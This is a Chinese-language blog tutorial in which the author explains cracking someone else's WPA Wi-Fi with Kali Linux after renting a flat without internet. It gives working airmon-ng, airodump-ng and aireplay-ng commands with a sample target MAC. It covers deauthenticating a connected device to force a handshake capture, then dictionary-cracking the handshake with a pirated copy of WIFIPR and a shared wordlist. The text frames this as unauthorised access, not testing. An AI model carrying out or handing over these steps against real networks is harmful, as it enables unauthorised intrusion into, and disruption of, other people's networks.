kali抓包破解wifi

暑假租房子没wifi,就想着破个wifi玩玩,

kali破解wifi的大致步骤:监听-攻击-抓包-跑包-获得密码

首先,kali需要一块无线网卡

样子 价格
https://b2.loadke.tech/change-hexo-img/93435201afc53027abe6b279d7ab6ff7.jpeg https://b2.loadke.tech/change-hexo-img/7bd3b63d6a3a1abd4753deadad9700ac.jpeg

还好,拼多多的kali识别得到的网卡才24块钱,

正题

  1. 将网卡插入电脑
    如果kali识别到了,就没其他事情了,如果没识别到,那可能就被主电脑识别占用走了,怎么办嘞?
    如下

https://b2.loadke.tech/change-hexo-img/3440f8fba5f8666ead139f6fe388b839.png

  1. 打开虚拟机kali终端
  2. 输入 ifconfig查看网卡信息,有wlan0表示USB无线网卡链接成功
  3. 激活网卡监听(monitor) 模式
1
airmon-ng start wlan0

输入 iwconfig命令查看网卡信息,如果wlan0网卡名称加上了mon则表示成功,命令执行后网卡接口会变为 wlan0mon

  1. 输入命令 airodump-ng wlan0mon开始扫描wifi,按ctrl+c可以随时结束任务

输入命令后的样式:

https://b2.loadke.tech/change-hexo-img/a5f07576b07e5125958bf1dbb184ac8b.png

所见名词 名词含义
BSSID 代表为MAC地址
PWR 为信号强弱的程度,数值越小信号越强
DATA 为数据量,越大代表使用的人越多
CH 为信道频率(频道)
ESSID 为WiFi的名称(中文有可能会乱码)
  1. 输入以下命令进入单独wifi监听抓包状态
    1
    2
    3
    4
    airodump-ng -c 信道号 --bssid MAC地址 -w 抓到包后存放位置 wlan0mon

    #例如:
    airodump-ng -c 11 --bssid F8:8C:21:E5:E7:9F -w /home/zhao2 wlan0mon

如果抓到包会显示如下红框处的英文字母样式:

https://b2.loadke.tech/change-hexo-img/401e2f557dd9ca520c80ac9b5cd75d8c.png

先说说出现这个字样的条件:出现此样式一定得是有用户重新连接到这个wifi,如果没有人连接,那我们就只有创造手机终端去重新连接这个wifi,怎么做嘞?如下:

  1. 攻击此刻连接到吃WiFi的终端设备
    首先打开一个新的终端面板窗口,输入以下命令:
1
2
3
4
airepaly-ng -0 攻击次数 -c 连接到此wifi的终端MAC地址号 -a bssid号  wlan0mon

#例如:攻击10次:6C:EF:C6:C6:C1:4E此设备
aireplay-ng -0 10 -c 6C:EF:C6:C6:C1:4E -a F8:8C:21:E5:E7:9F wlan0mon

此时屏幕上就会有,攻击次数的展示,10此后会自动停止,如果为零,就会不停的攻击,直到你ctrl+c

攻击的时候,对方是掉线的,连不上wifi,只有停止攻击才会重连,重连后,我们就能获取到他的握手包,也就会出现如上图的红框处的英文字样,

  1. 此刻就可以在你所设定的包的保存位置找到.cap为后缀的握手包。
  2. 包有了,那就可以跑包了,跑包需要软件,也可用kali自带的包跑,但是何必嘞,咱有软件,kali跑包太慢了

跑包软件名:WIFIPR

此处为大家准备了破解版的:WIFIPR 密码:i3q2

还有破解字典:跑包字典 提取码: 5eqp

  1. WIFIPR如何使用:

首先打开软件 更改语言 如下图位置:
https://b2.loadke.tech/change-hexo-img/4811bae2dab690929406cf2cbe907693.png

然后选择字典攻击如下图所示:

https://b2.loadke.tech/change-hexo-img/976202dda493365d3c9aeb914ff58ae6.png

点击攻击设置导入字典包,字典压缩包需要解压后才导入:

https://b2.loadke.tech/change-hexo-img/cfe6c7d0bd32fa3c180d92306694cfd5.png

然后把抓到的握手包导入到软件,导入方式,可以拖进来也可以点击菜单栏导入,方式随自己

然后就可以点击开始,来破解这个握手包了,破解不一定能成功,这是根据字典强不强大来决定的,祝你好运吧。。。